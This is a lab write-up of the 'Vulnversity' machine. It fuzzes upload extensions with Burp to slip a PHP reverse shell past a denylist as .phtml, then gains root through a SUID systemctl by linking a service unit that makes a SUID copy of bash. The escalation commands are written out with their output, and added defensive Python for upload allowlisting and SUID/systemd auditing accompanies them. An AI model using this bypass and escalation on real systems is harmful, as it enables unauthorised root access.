Vulnversity

Burp Suite

There is server-side filtering which prevents us from uploading specific file extensions. We can use Burp Intruder to fuzz the extension in file.[EXTENSION_TO_FUZZ] and find which ones are accepted.


  • In this case the .phtml extension (file.[phtml]) is not blacklisted.
POST /internal/index.php HTTP/1.1
Host: 10.10.242.24:3333
Content-Length: 283
Origin: http://10.10.242.24:3333
Referer: http://10.10.242.24:3333/internal/index.php
Connection: close

Content-Disposition: form-data; name="file"; filename="file.md" <-- fuzzing position: the `.md` extension is replaced by each candidate to find the allowed extensions
Content-Type: text/markdown

  • The reverse shell was uploaded successfully and is listed under [IP:3333/internal/uploads]:
   Name                      Last modified      Size
   Parent Directory          -
   php-reverse-shell.phtml   2022-10-07 05:09   5.4K
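The filter above fails because it is a denylist: it blocks the extensions its author thought of and lets everything else through, so a single handler-mapped extension it missed (.phtml here) is enough. The following is an added example, not code from the room or from the target application, showing the two policies side by side: a constructed, deliberately incomplete denylist that models the one on the page, and an allowlist of the document types the form is assumed to need. It also illustrates two checks a defender wants around the extension test: judge only the basename's last suffix (so double extensions and path characters are handled), and never trust the client-supplied Content-Type, since the request on this page sets `text/markdown` by hand.

```python
"""Allowlist vs. denylist upload filtering (added example, not from the page)."""
import os
import posixpath
import uuid
from typing import Dict, Iterable, Optional, Tuple

# Constructed approximation of an incomplete denylist like the one the page
# describes: it blocks the obvious ".php" but not every extension the web
# server's PHP handler is mapped to (the page shows ".phtml" slipping through).
INCOMPLETE_DENYLIST = {".php", ".php5"}

# Allowlist of the document types this upload form is meant to accept
# (an assumption for the example; the real form's intended types are unknown).
ALLOWED_EXTENSIONS = {".md", ".txt", ".png", ".jpg"}


def extension_of(filename: str) -> str:
    """Return the lower-cased final extension of the client-supplied name.

    Only the basename is considered, so path separators in the name cannot
    steer the file outside the upload directory, and the LAST suffix is used
    so that 'notes.md.phtml' is judged by '.phtml', not '.md'.
    """
    base = posixpath.basename(filename.replace("\\", "/"))
    return os.path.splitext(base)[1].lower()


def denylist_allows(filename: str, deny=INCOMPLETE_DENYLIST) -> bool:
    """The fragile policy: accept anything not explicitly blocked."""
    return extension_of(filename) not in deny


def allowlist_allows(filename: str, allow=ALLOWED_EXTENSIONS) -> bool:
    """The robust policy: accept only the extensions the application needs."""
    return extension_of(filename) in allow


def storage_name(filename: str, allow=ALLOWED_EXTENSIONS) -> Optional[str]:
    """Server-chosen name for an accepted upload, or None if rejected.

    The client-supplied filename and Content-Type header are both under the
    uploader's control, so neither is trusted: the file is stored under a
    random name that keeps only the validated extension.
    """
    ext = extension_of(filename)
    if ext not in allow:
        return None
    return f"{uuid.uuid4().hex}{ext}"


def audit(filenames: Iterable[str], deny=INCOMPLETE_DENYLIST,
          allow=ALLOWED_EXTENSIONS) -> Dict[str, Tuple[bool, bool]]:
    """Evaluate both policies over a set of names: {name: (deny_ok, allow_ok)}."""
    return {n: (denylist_allows(n, deny), allowlist_allows(n, allow)) for n in filenames}


if __name__ == "__main__":
    # Constructed sample names; the .phtml one is the filename the page shows.
    samples = ["file.md", "php-reverse-shell.phtml", "shell.PHP", "notes.md.phtml", "../x.png"]
    for name, (d, a) in audit(samples).items():
        print(f"{name:26s} denylist: {'accept' if d else 'reject':6s}  "
              f"allowlist: {'accept' if a else 'reject'}")
```

Run stand-alone it prints one row per sample; the .phtml name is accepted by the denylist and rejected by the allowlist, which is the whole difference between the two designs. The upper-case `shell.PHP` case shows why the comparison must normalise case before either lookup.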


Privilege Escalation

  • We can catch the reverse shell using Netcat.
www-data@vulnuniversity /$  id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

  • The /bin/systemctl binary has the SUID bit set.
www-data@vulnuniversity /$  find / -type f -perm -04000 -ls 2>/dev/null
...
131166 648 -rwsr-xr-x 1 root root 659856 Feb 13 2019 /bin/systemctl
...

  • We can copy the bash binary into /tmp and have systemctl run a service unit that sets the SUID bit on that copy.
www-data@vulnuniversity tmp$  TF=$(mktemp).service
www-data@vulnuniversity tmp$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "cp /bin/bash /tmp && chown root:root /tmp/bash && chmod 4777 /tmp/bash"
> [Install]
> WantedBy=multi-user.target' > $TF
www-data@vulnuniversity tmp$ systemctl link $TF
Created symlink from /etc/systemd/system/tmp.o1RIIbIg2b.service to /tmp/tmp.o1RIIbIg2b.service.
www-data@vulnuniversity tmp$ systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.o1RIIbIg2b.service to /tmp/tmp.o1RIIbIg2b.service.
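Both halves of this escalation leave artefacts a defender can check for: a SUID-root binary that does not belong to the distribution's expected set (the `find` output above), and a systemd unit whose symlink points into a world-writable directory such as /tmp (the `Created symlink` lines above). The following is an added audit script, not code from the room or from the target machine; it parses a constructed excerpt in the shape of `find / -type f -perm -04000 -ls` output (the /bin/systemctl line mirrors the one on the page, the others are typical entries added for the example), compares it with an assumed baseline of expected SUID binaries, and flags unit symlinks whose targets lie outside the directories systemd is expected to load from. The `scan_unit_dir` helper does the same against a live /etc/systemd/system when run on a host.

```python
"""Audit SUID-root binaries and systemd unit symlinks (added example, not from the page)."""
import os
import re
from typing import Iterable, Iterator, List, Tuple

# Constructed excerpt in the shape of `find / -type f -perm -04000 -ls` output.
FIND_LS_OUTPUT = """\
131166 648 -rwsr-xr-x 1 root root 659856 Feb 13 2019 /bin/systemctl
131082  40 -rwsr-xr-x 1 root root  40152 Jan 18 2018 /bin/su
131056  44 -rwsr-xr-x 1 root root  44664 Jan 18 2018 /usr/bin/passwd
"""

# Baseline of SUID-root binaries expected on this host (an assumption for the
# example; in practice derive it from a clean build or the package manifests).
EXPECTED_SUID = {"/bin/su", "/usr/bin/passwd", "/usr/bin/sudo"}

# Directories systemd is expected to load units from. A unit symlink whose
# target lives anywhere else (e.g. /tmp, as `systemctl link` produced above)
# is worth an alert.
TRUSTED_UNIT_DIRS = ("/etc/systemd/", "/lib/systemd/", "/usr/lib/systemd/", "/run/systemd/")

# Constructed (link, target) pairs; the two /tmp entries reproduce the
# symlinks reported on the page, the ssh one is a normal enabled service.
SAMPLE_LINKS = [
    ("/etc/systemd/system/multi-user.target.wants/ssh.service", "/lib/systemd/system/ssh.service"),
    ("/etc/systemd/system/tmp.o1RIIbIg2b.service", "/tmp/tmp.o1RIIbIg2b.service"),
    ("/etc/systemd/system/multi-user.target.wants/tmp.o1RIIbIg2b.service", "/tmp/tmp.o1RIIbIg2b.service"),
]

# inode, blocks, mode(+optional ACL/SELinux marker), links, owner, group, size,
# month, day, year-or-time, path
LS_LINE = re.compile(
    r"^\s*\d+\s+\d+\s+(?P<mode>[-a-zA-Z]{10}[.+]?)\s+\d+\s+(?P<owner>\S+)\s+\S+"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<path>/\S+)"
)


def parse_find_ls(text: str) -> Iterator[Tuple[str, str, str]]:
    """Yield (owner, mode, path) for each well-formed `find -ls` line."""
    for line in text.splitlines():
        m = LS_LINE.match(line)
        if m:
            yield m.group("owner"), m.group("mode"), m.group("path")


def unexpected_suid_root(text: str, baseline=EXPECTED_SUID) -> List[str]:
    """Root-owned files with the setuid bit (the 's' in the user-execute slot)
    that are not in the baseline."""
    return sorted(
        path for owner, mode, path in parse_find_ls(text)
        if owner == "root" and mode[3] in "sS" and path not in baseline
    )


def untrusted_unit_links(pairs: Iterable[Tuple[str, str]],
                         trusted=TRUSTED_UNIT_DIRS) -> List[Tuple[str, str]]:
    """(link, target) pairs whose normalised target is outside the trusted dirs."""
    return sorted(
        (link, target) for link, target in pairs
        if not os.path.normpath(target).startswith(trusted)
    )


def scan_unit_dir(root: str = "/etc/systemd/system") -> List[Tuple[str, str]]:
    """Collect (link, resolved target) pairs for every symlink under root.
    Returns an empty list where the directory does not exist (e.g. offline)."""
    found = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            link = os.path.join(dirpath, name)
            if os.path.islink(link):
                found.append((link, os.path.realpath(link)))
    return found


if __name__ == "__main__":
    for path in unexpected_suid_root(FIND_LS_OUTPUT):
        print(f"[SUID] not in baseline: {path}")
    for link, target in untrusted_unit_links(SAMPLE_LINKS):
        print(f"[UNIT] {link} -> {target} (outside trusted unit directories)")
    for link, target in untrusted_unit_links(scan_unit_dir()):
        print(f"[UNIT/live] {link} -> {target}")
```

On the sample data the script reports /bin/systemctl as an unexpected SUID-root binary and both /tmp-backed unit symlinks; the live scan prints nothing when /etc/systemd/system is absent. Pairing the baseline with package verification (for example the distribution's file-integrity check on the binary's package) tells you whether the SUID bit was set by the packager or added afterwards.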

  • Since the copied bash binary now has the SUID bit set, running it with -p keeps the root effective UID.
www-data@vulnuniversity tmp$  ./bash -p
www-data@vulnuniversity tmp$ id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
www-data@vulnuniversity tmp$ whoami
root